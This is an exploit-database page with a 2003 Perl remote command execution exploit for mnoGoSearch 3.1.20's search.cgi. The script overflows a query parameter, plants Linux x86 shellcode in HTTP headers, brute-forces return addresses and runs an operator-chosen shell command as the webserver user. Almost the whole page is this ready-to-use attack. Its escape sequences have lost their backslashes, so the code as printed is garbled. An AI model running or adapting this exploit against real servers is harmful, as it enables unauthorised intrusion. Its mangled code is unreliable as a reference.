[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : mnoGoSearch 3.1.20 Remote Command Execution Exploit
# Published : 2003-06-10
# Author : pokleyzz
# Previous Title : Solaris <= 8.0 LPD Command Execution
# Next Title : Atftpd 0.6 Remote Root Exploit (atftpdx.c)
#!/usr/bin/perl
#
# [ reloaded ]
# Remote Exploit for mnoGoSearch 3.1.20 that performs
# remote command execution as the webserver user id
# for linux ix86
# by pokleyzz
#
use IO::Socket;
$host = "127.0.0.1";
$cmd = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;
my $conn;
if ($ARGV[0]){
$host = $ARGV[0];
}
else {
print "[x] mnogosearch 3.1.x exploit for linux ix86 ntby pokleyzznn";
print "Usage:n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]n";
print "thostthostname to exploitn";
print "tcommandtcommand to execute on servern";
print "tpathtpath to search.cgi default /cgi-bin/search.cgin";
print "tporttport to connect ton";
print "tsufftif not success try to use 1, 2 or 3 for suff (default is 0)n";
print "trettreturn address default bfffd0d0n";
exit;
}
if ($ARGV[1]){
$cmd = $ARGV[1];
}
if ($ARGV[2]){
$searchpath = $ARGV[2];
}
if ($ARGV[3]){
$port = int($ARGV[3]);
}
if ($ARGV[4]){
$suffsize = int($ARGV[4]);
}
if ($ARGV[5]){
$rawret = hex_to_int($ARGV[5]);
}
#########~~ start function ~~#########
sub hex_to_int {
my $hs = $_[0];
$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) +
(hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
}
sub int_to_hex {
my $in = $_[0];
$hex = sprintf "%x",$in;
}
sub string_to_ret {
my $rawret = $_[0];
if (length($rawret) != 8){
print $rawret;
die "[*] incorrect return address ...n ";
} else {
$ret = chr(hex(substr($rawret, 2, 2)));
$ret .= chr(hex(substr($rawret, 0, 2)));
$ret .= chr(hex(substr($rawret, 6, 2)));
$ret .= chr(hex(substr($rawret, 4, 2)));
}
}
sub connect_to {
#print "[x] Connect to $host on port $port ...n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "[*] Can't connect to $host on port $port ...n";
$conn-> autoflush(1);
}
sub check_version {
my $result;
connect_to();
print "[x] Check if $host use correct version ...n";
print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1nHost: $hostnConnection: Closenn";
# capture result
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
if ($result =~ /_test_/){
print "[x] Correct version detected .. possibly vulnerable ...n";
} else {
print $result;
die "[x] New version or wrong urln";
}
}
sub exploit {
my $rw = $_[0];
$result = "";
# linux ix86 shellcode rip from phx.c by proton
$shellcode = "xebx3bx5ex8dx5ex10x89x1ex8dx7ex18x89x7ex04x8dx7ex1bx89x7ex08"
."xb8x40x40x40x40x47x8ax07x28xe0x75xf9x31xc0x88x07x89x46x0cx88"
."x46x17x88x46x1ax89xf1x8dx56x0cxb0x0bxcdx80x31xdbx89xd8x40xcd"
."x80xe8xc0xffxffxffx41x41x41x41x41x41x41x41x41x41x41x41x41x41"
."x41x41"
."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
."$cmd"
."@";
$strret = int_to_hex($rw);
$ret = string_to_ret($strret);
$envvar = 'B' x (4096 - length($shellcode));
$envvar .= $shellcode;
# generate query string
$buffer = "B" x $suffsize;
$buffer .= "B" x 4800;
$buffer .= $ret x 200;
$request = "GET $searchpath?ul=$buffer HTTP/1.1n"
."Accept: $envvarn"
."Accept-Language: $envvarn"
."Accept-Encoding: $envvarn"
."User-Agent: Mozilla/4.0n"
."Host: $hostn"
."Connection: Closenn";
&connect_to;
print "[x] Sending exploit code ..n";
print "[x] ret: $strretn";
print "[x] suf: $suffsizen";
print "[x] length:",length($request),"n";
print $conn "$request";
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
}
sub check_result {
if ($result =~ /hello/ && !($result =~ /text/html/)){
print $result;
$success = 1;
} else {
print $result;
print "[*] Failed ...n";
$success = 0;
}
}
#########~~ end function ~~#########
&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
&exploit($rawret);
&check_result;
if ($success == 1){
exit;
}
sleep 1;
}
# www.Syue.com [2003-06-10]